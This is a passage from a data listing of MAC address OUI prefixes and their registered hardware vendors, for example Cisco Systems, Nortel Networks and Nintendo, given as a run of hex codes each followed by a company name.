Ltd. 100D32 Embedian, Inc. 4C8B55 Grupo Digicon 04A3F3 Emicon 1C17D3 Cisco Systems, Inc 7CE044 NEON Inc 284C53 Intune Networks 64D02D NEXT GENERATION INTEGRATION LIMITED (NGI) 90513F Elettronica Santerno SpA 00B5D6 Omnibit Inc. 68784C Nortel Networks 9CF61A Carrier Fire & Security 7CF098 Bee Beans Technologies, Inc. 8841C1 ORBISAT DA AMAZONIA IND E AEROL SA 9C7514 Wildix srl F8D756 Simm Tronic Limited A40CC3 Cisco Systems, Inc 4CBAA3 Bison Electronics Inc. EC7C74 Justone Technologies Co., Ltd. A8B1D4 Cisco Systems, Inc CCFCB1 Wireless Technology, Inc. 3C1A79 Huayuan Technology CO.,LTD 84A991 Cyber Trans Japan Co.,Ltd. 4CF737 SamJi Electronics Co., Ltd F0D767 Axema Passagekontroll AB C802A6 Beijing Newmine Technology C84C75 Cisco Systems, Inc E86CDA Supercomputers and Neurocomputers Research Center 240B2A Viettel Group 6C5CDE SunReports, Inc. 34F39B WizLAN Ltd. 4C3089 Thales Transportation Systems GmbH 548922 Zelfy Inc E02630 Intrigue Technologies, Inc. FCCF62 IBM Corp 084E1C H2A Systems, LLC A4ADB8 Vitec Group, Camera Dynamics Ltd 84F64C Cross Point BV C08B6F S I Sistemas Inteligentes Eletrônicos Ltda F86ECF Arcx Inc 8C8401 Private 408493 Clavister AB 6C7039 Novar GmbH 481249 Luxcom Technologies Inc. 24A937 PURE Storage 348302 iFORCOM Co., Ltd B43DB2 Degreane Horizon 78A6BD DAEYEON Control&Instrument Co,.Ltd 3C1915 GFI Chrono Time ECB106 Acuro Networks, Inc 5C57C8 Nokia Corporation D46CBF Goodrich ISR C835B8 Ericsson, EAB/RWI/K F89D0D Control Technology Inc. 2C3F3E Alge-Timing GmbH 34BA51 Se-Kure Controls, Inc. 982D56 Resolution Audio 147373 TUBITAK UEKAE 089F97 LEROY AUTOMATION ECC882 Cisco Systems, Inc 90A7C1 Pakedge Device and Software Inc. 80BAAC TeleAdapt Ltd 6CFDB9 Proware Technologies Co Ltd. C06C0F Dobbs Stanford 502DF4 Phytec Messtechnik GmbH 2CCD27 Precor Inc 10189E Elmo Motion Control 8C56C5 Nintendo Co., Ltd. 88B627 Gembird Europe BV F06853 Integrated Corporation A4B121 Arantia 2010 S.L. E02636 Nortel Networks 5849BA Chitai Electronic Corp. 00D11C ACETEL C86CB6 Optcom Co., Ltd. A01859 Shenzhen Yidashi Electronics Co Ltd E8056D Nortel Networks C45976 Fugoo Coorporation CCB888 AnB Securite s.a. 6C5E7A Ubiquitous Internet Telecom Co., Ltd B42CBE Direct Payment Solutions Limited CC2218 InnoDigital Co., Ltd. C86C1E Display Systems Ltd 104369 Soundmax Electronic Limited 34862A Heinz Lackmann GmbH & Co KG B4ED54 Wohler Technologies 50A6E3 David Clark Company 50934F Gradual Tecnologia Ltda. ACE348 MadgeTech, Inc 549A16 Uzushio Electric Co.,Ltd. 9018AE Shanghai Meridian Technologies, Co. Ltd. F8DC7A Variscite LTD 601D0F Midnite Solar A8F94B Eltex Enterprise Ltd. 0C8230 SHENZHEN MAGNUS TECHNOLOGIES CO.,LTD 746B82 MOVEK 9CC077 PrintCounts, LLC 3CB17F Wattwatchers Pty Ld CC5459 OnTime Networks AS D4F143 IPROAD.,Inc B8F732 Aryaka Networks Inc E8DFF2 PRF Co., Ltd. 006440 Cisco Systems, Inc 94C4E9 PowerLayer Microsystems HongKong Limited 8843E1 Cisco Systems, Inc B8B1C7 BT&COM CO.,LTD DC2C26 Iton Technology Limited D411D6 ShotSpotter, Inc. 9CAFCA Cisco Systems, Inc 1C0FCF Sypro Optics GmbH 9C4E8E ALT Systems Ltd 0494A1 CATCH THE WIND INC 003A99 Cisco Systems, Inc 003A9A Cisco Systems, Inc 003A98 Cisco Systems, Inc 7072CF EdgeCore Networks 7C7BE4 Z'SEDAI KENKYUSHO CORPORATION F0DE71 Shanghai EDO Technologies Co.,Ltd. 60D30A Quatius Limited 24CF21 Shenzhen State Micro Technology Co., Ltd 10BAA5 GANA I&C CO., LTD BC9DA5 DASCOM Europe GmbH 042BBB PicoCELA, Inc. FC0877 Prentke Romich Company ECD00E MiraeRecognition Co., Ltd. A4AD00 Ragsdale Technology 4C9EE4 Hanyang Navicom Co.,Ltd. C47D4F Cisco Systems, Inc 3CDF1E Cisco Systems, Inc 64BC11 CombiQ AB EC3091 Cisco Systems, Inc F4ACC1 Cisco Systems, Inc 4097D1 BK Electronics cc 0CE936 ELIMOS srl 60391F ABB Ltd E8A4C1 Deep Sea Electronics Ltd 64F970 Kenade Electronics Technology Co.,LTD. C87248 Aplicom Oy 28FBD3 Ragentek Technology Group 586ED6 Private C8D2C1 Jetlun (Shenzhen) Corporation E09153 XAVi Technologies Corp. F04BF2 JTECH Communications, Inc. 986DC8 TOSHIBA MITSUBISHI-ELECTRIC INDUSTRIAL SYSTEMS CORPORATION 88A5BD QPCOM INC. 6CAC60 Venetex Corp 80177D Nortel Networks C82E94 Halfa Enterprise Co., Ltd. 00271F MIPRO Electronics Co., Ltd 002712 MaxVision LLC 0026CF DEKA R&D 0026C5 Guangdong Gosun Telecommunications Co.,Ltd D4C766 Acentic GmbH A02EF3 United Integrated Services Co., Led. A09805 OpenVox Communication Co Ltd 0026C4 Cadmos microsystems S.r.l. 0026C8 System Sensor 0026C2 SCDI Co. LTD 0026A9 Strong Technologies Pty Ltd 0026A5 MICROROBOT.CO.,LTD 0026F3 SMC Networks 0026E7 Shanghai ONLAN Communication Tech. Co., Ltd. 00270C Cisco Systems, Inc 002703 Testech Electronics Pte Ltd 0026E0 ASITEQ 0026A3 FQ Ingenieria Electronica S.A. 00269D M2Mnet Co., Ltd. 002697 Alpha Technologies Inc. 00268A Terrier SC Ltd 002612 Space Exploration Technologies 002616 Rosemount Inc. 00260B Cisco Systems, Inc 0025FD OBR Centrum Techniki Morskiej S.A. 002600 TEAC Australia Pty Ltd. 0025FF CreNova Multimedia Co., Ltd 0025F3 Nordwestdeutsche Zählerrevision 0025EC Humanware 002651 Cisco Systems, Inc 00264E r2p GmbH 00264F Krüger &Gothe GmbH 002639 T.M. Electronics, Inc. 00267A wuhan hongxin telecommunication technologies co.,ltd 002672 AAMP of America 002623 JRD Communication Inc 002627 Truesell 002621 InteliCloud Technology Inc. 00261C NEOVIA INC. 002689 General Dynamics Robotic Systems 002685 Digital Innovation 002664 Core System Japan 002659 Nintendo Co., Ltd. 0025B8 Agile Communications, Inc. 0025B0 Schmartz Inc 0025AD Manufacturing Resources International 0025AC I-Tech corporation 0025AB AIO LCD PC BU / TPV 0025C6 kasercorp, ltd 0025C5 Star Link Communication Pvt. Ltd. 0025C7 altek Corporation 0025BA Alcatel-Lucent IPD 0025BB INNERINT Co., Ltd. 0025B1 Maya-Creation Corporation 0025ED NuVo Technologies LLC 0025E9 i-mate Development, Inc. 0025E6 Belgian Monitoring Systems bvba 0025E0 CeedTec Sdn Bhd 0025DE Probits Co., LTD. 0025DD SUNNYTEK INFORMATION CO., LTD. 00254A RingCube Technologies, Inc. 00254F ELETTROLAB Srl 002549 Jeorich Tech. Co.,Ltd. 002539 IfTA GmbH 002537 Runcom Technologies Ltd. 00255D Morningstar Corporation 002558 MPEDIA 002591 NEXTEK, Inc. 00258D Haier 002583 Cisco Systems, Inc 0025A1 Enalasys 00259A CEStronics GmbH 002571 Zhejiang Tianle Digital Electric Co.,Ltd 0025CE InnerSpace 002538 Samsung Electronics Co., Ltd., Memory Division 002544 LoJack Corporation 002532 Digital Recorders 002507 ASTAK Inc. 002502 NaturalPoint 0024F8 Technical Solutions Company Ltd. 0024F9 Cisco Systems, Inc 002514 PC Worth Int'l Co., Ltd. 00250B CENTROFACTOR INC 002506 A.I. ANTITACCHEGGIO ITALIA SRL 00251C EDT 00251A Psiber Data Systems Inc. 0024E3 CAO Group 0024E1 Convey Computer Corp. 0024D9 BICOM, Inc. 0024F2 Uniphone Telecommunication Co., Ltd. 0024EE Wynmax Inc. 0024C3 Cisco Systems, Inc 0024C4 Cisco Systems, Inc 0024B0 ESAB AB 0024B5 Nortel Networks 002405 Dilog Nordic AB 00246F Onda Communication spa 002469 Fasttel - Smart Doorphones 002464 Bridge Technologies Co AS 002489 Vodafone Omnitel N.V. 00247F Nortel Networks 002475 Compass System(Embedded Dept.) 002420 NetUP Inc. 00241E Nintendo Co., Ltd. 00241F DCT-Delta GmbH 002413 Cisco Systems, Inc 00240E Inventec Besta Co., Ltd. 00249D NES Technology Inc. 00248E Infoware ZRt. 002494 Shenzhen Baoxin Tech CO., Ltd. 002462 Rayzone Corporation 002460 Giaval Science Development Co. Ltd. 00245C Design-Com Technologies Pty. Ltd. 00244F Asantron Technologies Ltd. 002444 Nintendo Co., Ltd. 00243D Emerson Appliance Motors and Controls 002437 Motorola - BSG 00235B Gulfstream 002359 Benchmark Electronics ( Thailand ) Public Company Limited 002357 Pitronot Technologies and Engineering P.T.E. Ltd. 002355 Kinco Automation(Shanghai) Ltd. 0023E3 Microtronic AG 0023DD ELGIN S.A. 0023DE Ansync Inc. 0023D9 Banner Engineering 0023DA Industrial Computer Source (Deutschland)GmbH 002398 Vutlan sro 00238F NIDEC COPAL CORPORATION 0023AC Cisco Systems, Inc 00239F Institut für Prüftechnik 00239D Mapower Electronics Co., Ltd 002373 GridIron Systems, Inc. 002367 UniControls a.s. 002368 Zebra Technologies Inc 00236E Burster GmbH & Co KG 002366 Beijing Siasun Electronic System Co.,Ltd. 0023FD AFT Atlas Fahrzeugtechnik GmbH 0023EF Zuend Systemtechnik AG 0023E8 Demco Corp. 002380 Nanoteq 0023B7 Q-Light Co., Ltd. 0023D8 Ball-It Oy 0022CD Ared Technology Co., Ltd. 0022CC SciLog, Inc. 0022CB IONODES Inc. 0022C6 Sutus Inc 0022C8 Applied Instruments B.V. 00231E Cezzer Multimedia Technologies 00231F Guangda Electronic & Telecommunication Technology Development Co., Ltd. 002270 ABK North America, LLC 002313 Qool Technologies Ltd. 002310 LNC Technology Co., Ltd. 00230C CLOVER ELECTRONICS CO.,LTD. 0022EF iWDL Technologies 0022F2 SunPower Corp 0022E8 Applition Co., Ltd. 0022E9 ProVision Communications 0022E6 Intelligent Data 0022E3 Amerigon 0022A6 Sony Computer Entertainment America 0022A7 Tyco Electronics AMP GmbH 0022A1 Huawei Symantec Technologies Co.,Ltd. 002301 Witron Technology Limited 0022F7 Conceptronic 0022EB Data Respons A/S 00233F Purechoice Inc 002334 Cisco Systems, Inc 0022E2 WABTEC Transit Division 0022C0 Shenzhen Forcelink Electronic Co, Ltd 00231B Danaher Motion - Kollmorgen 002220 Mitac Technology Corp 002227 uv-electronic GmbH 002225 Thales Avionics Ltd 00221E Media Devices Co., Ltd. 002296 LinoWave Corporation 00220E Indigo Security Co., Ltd. 002207 Inteno Broadband Technology AB 002206 Cyberdyne Inc. 002237 Shinhint Group 00222F Open Grid Computing, Inc. 00226F 3onedata Technology Co. Ltd. 002260 AFREEY Inc. 002278 Shenzhen Tongfang Multimedia Technology Co.,Ltd. 00227A Telecom Design 002244 Chengdu Linkon Communications Device Co., Ltd 002250 Point Six Wireless, LLC 00223E IRTrans GmbH 00229D PYUNG-HWA IND.CO.,LTD 0021EF Kapsys 0021ED Telegesis 0021EB ESP SYSTEMS, LLC 0021DB Santachi Video Technology (Shenzhen) Co., Ltd. 0021DF Martin Christ GmbH 0021D4 Vollmer Werke GmbH 0021D6 LXI Consortium 0021CE NTC-Metrotek 0021CA ART System Co., Ltd. 0021CB SMS TECNOLOGIA ELETRONICA LTDA 0021C8 LOHUIS Networks 00215E IBM Corp 002155 Cisco Systems, Inc 002157 National Datacast, Inc. 00214D Guangzhou Skytone Transmission Technology Com. Ltd. 002150 EYEVIEW ELECTRONICS 002182 SandLinks Systems, Ltd. 002183 ANDRITZ HYDRO GmbH 002174 AvaLAN Wireless 002196 Telsey S.p.A. 00218D AP Router Ind. Eletronica LTDA 002190 Goliath Solutions 002185 MICRO-STAR INT'L CO.,LTD. 0021A8 Telephonics Corporation 0021A9 Mobilink Telecom Co.,Ltd 0021A6 Videotec Spa 00219F SATEL OY 0021BF Hitachi High-Tech Control Systems Corporation 0021BC ZALA COMPUTER 0021B4 APRO MEDIA CO., LTD 002202 Excito Elektronik i Skåne AB 0021F6 Oracle Corporation 002179 IOGEAR, Inc. 002168 iVeia, LLC 00213B Berkshire Products, Inc 002137 Bay Controls, LLC 002139 Escherlogic Inc. 00212C SemIndia System Private Limited 00212B MSA Auer 00212A Audiovox Corporation 001FCE QTECH LLC 001FB0 TimeIPS, Inc. 001FAE Blick South Africa (Pty) Ltd 001FF0 Audio Partnership 001FEA Applied Media Technologies Corporation 001FE9 Printrex, Inc. 001FDD GDI LLC 001FDA Nortel Networks 001FD9 RSD Communications Ltd 002110 Clearbox Systems 00210C Cymtec Systems, Inc. 00210B GEMINI TRAZE RFID PVT. LTD. 002104 Gigaset Communications GmbH 001FFB Green Packet Bhd 001F87 Skydigital Inc. 001F88 FMS Force Measuring Systems AG 001F86 digEcor 001F80 Lucas Holding bv 001B58 ACE CAD Enterprise Co., Ltd. 001F79 Lodam Electronics A/S 001F71 xG Technology, Inc. 001F6C Cisco Systems, Inc 001F6F Fujian Sunnada Communication Co.,Ltd. 001F60 COMPASS SYSTEMS CORP. 001F6A PacketFlux Technologies, Inc. 001F65 KOREA ELECTRIC TERMINAL CO., LTD. 001FA5 Blue-White Industries 001F9D Cisco Systems, Inc 001F9F Thomson Telecom Belgium 001FA1 Gtran Inc 001F99 SERONICS co.ltd 001F5E Dyna Technology Co.,Ltd. 001F55 Honeywell Security (China) Co., Ltd. 001F54 Lorex Technology Inc. 001F4B Lineage Power 001F2E Triangle Research Int'l Pte Ltd 001F23 Interacoustics 001F17 IDX Company, Ltd. 001F1B RoyalTek Company Ltd. 001F0D L3 Communications - Telemetry West 001EFC JSC "MASSA-K" 001F06 Integrated Dispatch Solutions 001F96 APROTECH CO.LTD 001F8B Cache IQ 001F85 Apriva ISS, LLC 001F40 Speakercraft Inc. 001EE8 Mytek 001EEE ETL Systems Ltd 001EE0 Urmet SpA 001EDA Wesemann Elektrotechniek B.V. 001ED7 H-Stream Wireless, Inc. 001EFA PROTEI Ltd. 001EFB Trio Motion Technology Ltd 001EF8 Emfinity Inc. 001EB4 UNIFAT TECHNOLOGY LTD. 001EA8 Datang Mobile Communications Equipment CO.,LTD 001EAB TeleWell Oy 001E9F Visioneering Systems, Inc. 001E61 ITEC GmbH 001E59 Silicon Turnkey Express, LLC 001E51 Converter Industry Srl 001ED5 Tekon-Automatics 001ECB "RPC "Energoautomatika" Ltd 001E71 MIrcom Group of Companies 001E6B Cisco SPVTG 001E70 Chelton Limited 001E8A eCopy, Inc 001E9B San-Eisha, Ltd. 001E96 Sepura Plc 001EBA High Density Devices AS 001D9D ARTJOY INTERNATIONAL LIMITED 001D9E AXION TECHNOLOGIES 001D9A GODEX INTERNATIONAL CO., LTD 001D97 Alertus Technologies LLC 001E1B Digital Stream Technology, Inc. 001E17 STN BV 001E18 Radio Activity srl 001E15 Beech Hill Electronics 001DF8 Webpro Vision Technology Corporation 001DF9 Cybiotronics (Far East) Limited 001DF7 R. STAHL Schaltgeräte GmbH 001DEB DINEC International 001E3E KMW Inc. 001E38 Bluecard Software Technology Co., Ltd. 001E30 Shireen Inc 001E2E SIRTI S.p.A. 001DC4 AIOI Systems Co., Ltd. 001DC0 Enphase Energy 001DBD Versamed Inc. 001E05 Xseed Technologies & Computing 001E07 Winy Technology Co., Ltd. 001E0A Syba Tech Limited 001E03 LiComm Co., Ltd. 001DB7 Tendril Networks, Inc. 001DAE CHANG TSENG TECHNOLOGY CO., LTD 001DA6 Media Numerics Limited 001DDC HangZhou DeChangLong Tech&Info Co.,Ltd 001E47 PT. Hariff Daya Tunggal Engineering 001E48 Wi-Links 001D1F Siauliu Tauro Televizoriai, JSC 001D79 SIGNAMAX LLC 001D78 Invengo Information Technology Co.,Ltd 001D6F Chainzone Technology Co., Ltd 001D62 InPhase Technologies 001D63 Miele & Cie. KG 001D13 NextGTV 001D10 LightHaus Logic, Inc. 001D14 SPERADTONE INFORMATION TECHNOLOGY LIMITED 001D3F Mitron Pty Ltd 001D39 MOOHADIGITAL CO., LTD 001D37 Thales-Panda Transportation System 001D30 YX Wireless S.A. 001D7F Tekron International Ltd 001D70 Cisco Systems, Inc 001D43 Shenzhen G-link Digital Technology Co., Ltd. 001D91 Digitize, Inc 001D95 Flash, Inc. 001D8D Fluke Process Instruments GmbH 001D04 Zipit Wireless, Inc. 001CF2 Tenlon Technology Co.,Ltd. 001CBB MusicianLink 001CB2 BPT SPA 001CB5 Neihua Network Technology Co.,LTD.(NHN) 001CB4 Iridium Satellite LLC 001CB6 Duzon CNT Co., Ltd. 001CCD Alektrona Corporation 001CC7 Rembrandt Technologies, LLC d/b/a REMSTREAM 001C61 Galaxy Microsystems LImited 001C63 TRUEN 001C5C Integrated Medical Systems, Inc. 001C52 VISIONEE SRL 001C7D Excelpoint Manufacturing Pte Ltd 001C77 Prodys 001C6F Emfit Ltd 001C6C 30805 001C47 Hangzhou Hollysys Automation Co., Ltd 001C49 Zoltan Technology Inc. 001C8D Mesa Imaging 001C89 Force Communications, Inc. 001C87 Uriver Inc. 001C9F Razorstream, LLC 001CEC Mobilesoft (Aust.) Pty Ltd 001CE8 Cummins Inc 001CD0 Circleone Co.,Ltd. 001B9B Hose-McCann Communications 001B9C SATEL sp. z o.o. 001B92 l-acoustics 001B8E Hulu Sweden AB 001C28 Sphairon Technologies GmbH 001C1F Quest Retail Technology Pty Ltd 001C16 ThyssenKrupp Elevator 001C19 secunet Security Networks AG 001C3F International Police Technologies, Inc. 001C3B AmRoad Technology Inc. 001C32 Telian Corporation 001C2B Alertme.com Limited 001BEC Netio Technologies Co., Ltd 001BE8 Ultratronik GmbH 001BE1 ViaLogy 001BDF Iskra Sistemi d.d. 001BD9 Edgewater Wireless Systems Inc 001BA6 intotech inc. 001BA4 S.A.E Afikim 001B93 JC Decaux SA DNT 001BB4 Airvod Limited 001BB6 Bird Electronic Corp. 001C09 SAE Electronic Co.,Ltd. 001C0C TANITA Corporation 001BC7 StarVedia Technology Inc. 001B0B Phidgets Inc. 001B0C Cisco Systems, Inc 001B07 Mendocino Software 001B08 Danfoss Drives A/S 001B01 Applied Radio Technologies 001B02 ED Co.Ltd 001AFC ModusLink Corporation 001B76 Ripcode, Inc. 001B70 IRI Ubiteq, INC. 001B6C LookX Digital Media BV 001B6B Swyx Solutions AG 001B69 Equaline Corporation 001B68 Modnnet Co., Ltd 001B62 JHT Optoelectronics Co.,Ltd. 001B3F ProCurve Networking by HP 001B41 General Infinity Co.,Ltd. 001B3E Curtis, Inc. 001B37 Computec Oy 001AF6 Woven Systems, Inc. 001AF9 AeroVIronment (AV Inc) 001AE0 Mythology Tech Express Inc. 001B30 Solitech Inc. 001B23 SimpleComTools 001B50 Nizhny Novgorod Factory named after M.Frunze, FSUE (NZiF) 001B47 Futarque A/S 001B45 ABB AS, Division Automation Products 001B18 Tsuken Electric Ind. Co.,Ltd 001B10 ShenZhen Kang Hui Technology Co.,ltd 001B8A 2M Electronic A/S 001B80 LORD Corporation 001A8B CHUNIL ELECTRIC IND., CO. 001A8D AVECS Bergen GmbH 001A95 Hisense Mobile Communications Technoligy Co.,Ltd. 001A81 Zelax 001A87 Canhold International Limited 001ABE COMPUTER HI-TECH INC. 001AC1 3Com Ltd 001ABB Fontal Technology Incorporation 001ABD Impatica Inc. 001AAE Savant Systems LLC 001A58 CCV Deutschland GmbH - Celectronic eHealth Div. 001A5E Thincom Technology Co.,Ltd 001AB4 FFEI Ltd. 001AB5 Home Network System 001A79 TELECOMUNICATION TECHNOLOGIES LTD. 001AAA Analogic Corp. 001AD7 Christie Digital Systems, Inc. 001ACD Tidel Engineering LP 001A88 Venergy,Co,Ltd 001A74 Procare International Co 001AA4 Future University-Hakodate 001A9F A-Link Ltd 001AE2 Cisco Systems, Inc 001AE7 Aztek Networks, Inc. 001AC9 SUZUKEN CO.,LTD 001A24 Galaxy Telecom Technologies Ltd 001A20 CMOTECH Co. Ltd. 001A19 Computer Engineering Limited 001A18 Advanced Simulation Technology inc. 001A5C Euchner GmbH+Co. KG 001A5B NetCare Service Co., Ltd. 001A4E NTI AG / LinMot 001A52 Meshlinx Wireless Inc. 001A13 Wanlida Group Co., LTD 001A0F ARTECHE GROUP 0019F2 Teradyne K.K. 0019DE MOBITEK 0019E5 Lynx Studio Technology, Inc. 0019DB MICRO-STAR INTERNATIONAL CO., LTD. 0019CE Progressive Gaming International 001A43 Logical Link Communications 001A47 Agami Systems, Inc. 001A03 Angel Electronics Co., Ltd. 0019F9 TDK-Lambda 0019BD New Media Life 0019A9 Cisco Systems, Inc 001A2D The Navvo Group 001A2F Cisco Systems, Inc 00198D Ocean Optics, Inc. 001985 IT Watchdogs, Inc 001986 Cheng Hongjian 00193B LigoWave 001935 DUERR DENTAL AG 001932 Gude Systems GmbH 001951 NETCONS, s.r.o. 001957 Saafnet Canada Inc. 001956 Cisco Systems, Inc 001958 Bluetooth SIG, Inc. 0019AE Hopling Technologies b.v. 0019AF Rigol Technologies, Inc. 0019A7 ITU-T 00199E Nifty 00196B Danpex Corporation 00196A MikroM GmbH 00193D GMC Guardian Mobility Corp. 00199F DKT A/S 001899 ShenZhen jieshun Science&Technology Industry CO,LTD. 00189F Lenntek Corporation 001895 Hansun Technologies Inc. 0018FC Altec Electronic AG 0018F5 Shenzhen Streaming Video Technology Company Limited 0018F9 VVOND, Inc. 0018FA Yushin Precision Equipment Co.,Ltd. 0018EA Alltec GmbH 0018E8 Hacetron Corporation 001901 F1MEDIA 001906 Cisco Systems, Inc 0018FF PowerQuattro Co. 0018F4 EO TECHNICS Co., Ltd. 0018F6 Thomson Telecom Belgium 0018B7 D3 LED, LLC 001910 Knick Elektronische Messgeraete GmbH & Co. KG 001913 Chuang-Yi Network Equipment Co.Ltd. 001914 Winix Co., Ltd 0018C1 Almitec Informática e Comércio 0018C4 Raba Technologies LLC 0018C9 EOps Technology Limited 0018BC ZAO NVP Bolid 0018D8 ARCH METER Corporation 0018D9 Santosha Internatonal, Inc 0018CF Baldor Electric Company 001931 Balluff GmbH 0018E3 Visualgate Systems, Inc. 001875 AnaCise Testnology Pte Ltd 00185D TAIGUEN TECHNOLOGY (SHEN-ZHEN) CO., LTD. 00185E Nexterm Inc. 001822 CEC TELECOM CO.,LTD. 001820 w5networks 001814 Mitutoyo Corporation 001817 D. E. Shaw Research, LLC 00186D Zhenjiang Sapphire Electronic Industry CO. 00186F Setha Industria Eletronica LTDA 001828 e2v technologies (UK) ltd. 001835 Thoratec / ITC 001837 Universal ABIT Co., Ltd. 00188E Ekahau, Inc. 001883 FORMOSA21 INC. 001811 Neuros Technology International, LLC. 00180E Avega Systems 001801 Actiontec Electronics, Inc 0017F3 Harris Corporation 00184B Las Vegas Gaming, Inc. 00184A Catcher, Inc. 00178D Checkpoint Systems, Inc. 00178E Gunnebo Cash Automation AB 00177C Smartlink Network Systems Limited 001781 Greystone Data System, Inc. 001785 Sparr Electronics Ltd 001750 GSI Group, MicroE Systems 001755 GE Security 001751 Online Corporation 0017E0 Cisco Systems, Inc 0017D2 THINLINX PTY LTD 0017C7 MARA Systems Consulting AB 0017B2 SK Telesys 0017B1 ACIST Medical Systems, Inc. 0017A3 MIX s.r.l. 0017B8 NOVATRON CO., LTD. 0017BB Syrinx Industrial Electronics 0017BC Touchtunes Music Corporation 0017C1 CM Precision Technology LTD. 0017DE Advantage Six Ltd 0017D7 ION Geophysical Corporation Inc. 0017E1 DACOS Technologies Co., Ltd. 0017A6 YOSIN ELECTRONICS CO., LTD. 00179C DEPRAG SCHULZ GMBH u. CO. 001796 Rittmeyer AG 001767 Earforce AS 001763 Essentia S.p.A. 00175D Dongseo system. 001775 TTE Germany GmbH 001776 Meso Scale Diagnostics, LLC 001779 QuickTel 0016ED Utility, Inc 0016DE FAST Inc 0016DA Futronic Technology Co. Ltd. 0016D4 Compal Communications, Inc. 0016D7 Sunways AG 001715 Qstik 00170E Cisco Systems, Inc 001705 Methode Electronics 0016FF Wamin Optocomm Mfg Corp 001701 KDE, Inc. 0016EE Royaldigital Inc. 0016D1 ZAT a.s. 0016C5 Shenzhen Xing Feng Industry Co.,Ltd 0016CC Xcute Mobile Corp. 0016C7 Cisco Systems, Inc 001718 Vansco Electronics Oy 001719 Audiocodes USA, Inc 001711 Cytiva Sweden AB 001717 Leica Geosystems AG 00171D DIGIT 001739 Bright Headphone Electronics Company 00172C TAEJIN INFOTECH 00174C Millipore 001745 INNOTZ CO., Ltd 001748 Neokoros Brasil Ltda 001619 Lancelan Technologies S.L. 00161D Innovative Wireless Technologies, Inc. 001611 Altecon Srl 00160C LPL DEVELOPMENT S.A. DE C.V 001612 Otsuka Electronics Co., Ltd. 00160B TVWorks LLC 001669 MRV Communication (Networks) LTD 001668 Eishin Electronics 00165A Harman Specialty Group 001659 Z.M.P. RADWAG 001640 Asmobile Communication Inc. 00163C Rebox B.V. 001677 Bihl + Wiedemann GmbH 001672 Zenway enterprise ltd 001671 Symphox Information Co. 001655 FUHO TECHNOLOGY Co., LTD 001646 Cisco Systems, Inc 001648 SSD Company Limited 0016AA Kei Communication Technology Inc. 0016A8 CWT CO., LTD. 0016A6 Dovado FZ-LLC 0016A2 CentraLite Systems, Inc. 00167D Sky-Line Information Co., Ltd. 001625 Impinj, Inc. 001623 Interval Media 001695 AVC Technology (International) Limited 00158B Park Air Systems Ltd 001586 Xiamen Overseas Chinese Electronic Co., Ltd. 00157E Weidmüller Interface GmbH & Co. KG 001580 U-WAY CORPORATION 00157C Dave Networks, Inc. 00157F ChuanG International Holding CO.,LTD. 001576 LABiTec - Labor Biomedical Technologies GmbH 0015F1 KYLINK Communications Corp. 0015EA Tellumat (Pty) Ltd 0015E2 Dr.Ing. Herbert Knauer GmbH 0015E1 Picochip Ltd 00159D Tripp Lite 001592 Facom UK Ltd (Melksham) 0015D4 Emitor AB 0015D6 OSLiNK Sp. z o.o. 0015D5 NICEVT 0015B3 Caretech AB 0015AA Rextechnik International Co., 0015DF Clivet S.p.A. 0015D8 Interlink Electronics 0015D2 Xantech Corporation 001603 COOLKSKY Co., LTD 001609 Unitech electronics co., ltd. 0015F5 Sustainable Energy Systems 0015C7 Cisco Systems, Inc 0015BE Iqua Ltd. 001515 Leipold+Co.GmbH 00150F mingjong 00150B SAGE INFOTECH LTD. 001507 Renaissance Learning Inc 001508 Global Target Enterprise Inc 001502 BETA tech 0014FD Thecus Technology Corp. 0014FC Extandon, Inc. 00153F Alcatel Alenia Space Italia 00153B EMH metering GmbH & Co. KG 001533 NADAM.CO.,LTD 001537 Ventus Networks 0014EA S Digm Inc. (Safe Paradigm Inc.) 0014E5 Alticast 0014E0 LET'S Corporation 0014E2 datacom systems inc. 00155E Morgan Stanley 00155C Dresser Wayne 001559 Securaplane Technologies, Inc. 001557 Olivetti 001554 Atalum Wireless S.A. 0014F8 Scientific Atlanta 0014F7 CREVIS Co., LTD 0014F1 Cisco Systems, Inc 0014E4 infinias, LLC 0014DB Elma Trenew Electronic GmbH 0014CC Zetec, Inc. 0014CB LifeSync Corporation 001526 Remote Technologies Inc 001518 Shenzhen 10MOONS Technology Development CO.,Ltd 001534 A Beltrónica-Companhia de Comunicações, Lda 00143D Aevoe Inc. 00143A RAYTALK INTERNATIONAL SRL 001436 Qwerty Elektronik AB 001433 Empower Technologies(Canada) Inc. 001434 Keri Systems, Inc 001475 Wiline Networks, Inc. 001474 K40 Electronics 00146F Kohler Co 001466 Kleinhenz Elektronik GmbH 00146B Anagran, Inc. 001498 Viking Design Technology 001496 Phonic Corp. 001493 Systimax Solutions 00148D Cubic Defense Simulation Systems 001423 J-S Co. NEUROCOM 001425 Galactic Computing Corp. 001419 SIDSA 0014B3 CoreStar International Corp 0014B1 Axell Wireless Limited 00149F System and Chips, Inc. 001461 CORONA CORPORATION 001462 Digiwell Technology, inc 001463 IDCS N.V. 001465 Novo Nordisk A/S 001486 Echo Digital Audio Corporation 001482 Aurora Networks 00147F Thomson Telecom Belgium 001455 Coder Electronics Corporation 00144E SRISA 0014C6 Quixant Ltd 0013A6 Extricom Ltd 00139F Electronics Design Services, Co., Ltd. 0013A2 MaxStream, Inc 0013A0 ALGOSYSTEM Co., Ltd. 001398 TrafficSim Co.,Ltd 00139B ioIMAGE Ltd. 001396 Acbel Polytech Inc. 001393 Panta Systems, Inc. 00138B Phantom Technologies LLC 001388 WiMedia Alliance 001384 Advanced Motion Controls 001415 Intec Automation inc. 001410 Suzhou Keda Technology CO.,Ltd 001417 RSE Informations Technologie GmbH 001408 Eka Systems Inc. 00137B Movon Corporation 00136E Techmetro Corp. 00136D Tentaculus AB 00136A Hach Lange Sarl 001363 Verascape, Inc. 0013C7 IONOS Co.,Ltd. 0013BC Artimi Ltd 0013B2 Carallon Limited 0013AD Sendo Ltd 0013AA ALS & TEC Ltd. 0013A4 KeyEye Communications 0013A7 BATTELLE MEMORIAL INSTITUTE 0013DE Adapt4, LLC 0013DD Abbott Diagnostics 0013D7 SPIDCOM Technologies SA 0013EE JBX Designs Inc. 0013E5 TENOSYS, INC. 0013E2 GeoVision Inc. 001402 kk-electronic a/s 0013FF Dage-MTI of MC, Inc. 00130E Focusrite Audio Engineering Limited 001309 Ocean Broadband Networks 0012FF Lely Industries N.V. 001303 GateConnect 00133A VadaTech Inc. 00132A Sitronics Telecom Solutions 001334 Arkados, Inc. 001337 Orient Power Home Network Ltd. 001332 Beijing Topsec Network Security Technology Co., Ltd. 0012D7 Invento Networks, Inc. 0012C4 Viseon, Inc. 00134D Inepro BV 00134B ToGoldenNet 